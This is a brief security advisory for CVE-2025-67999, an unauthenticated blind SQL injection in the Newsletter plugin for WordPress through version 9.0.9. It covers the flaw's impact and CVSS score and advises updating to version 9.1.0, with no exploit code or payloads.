CVE-2025-67999

Vulnerability

Overview

The Newsletter plugin for WordPress (versions through 9.0.9) contains a blind SQL injection vulnerability due to improper neutralization of special elements used in an SQL command [1]. This flaw allows an attacker to inject malicious SQL queries without direct output feedback, making it a blind injection scenario.

Exploitation

The vulnerability can be exploited without authentication, requiring only network access to the WordPress site. The attack complexity is low, and the plugin's widespread use makes it a target for mass-exploit campaigns [1]. Attackers can send crafted HTTP requests to trigger the injection, potentially affecting thousands of websites regardless of traffic size.

Impact

Successful exploitation enables an attacker to interact with the underlying database, including reading sensitive data such as user credentials, personal information, and other stored content. The CVSS score of 7.6 reflects the high confidentiality impact, though the vendor notes that the severity is considered low for WordPress environments [1].

Mitigation

The vulnerability is patched in version 9.1.0 of the Newsletter plugin. Users are strongly advised to update immediately. If updating is not possible, consulting a hosting provider or web developer for assistance is recommended [1].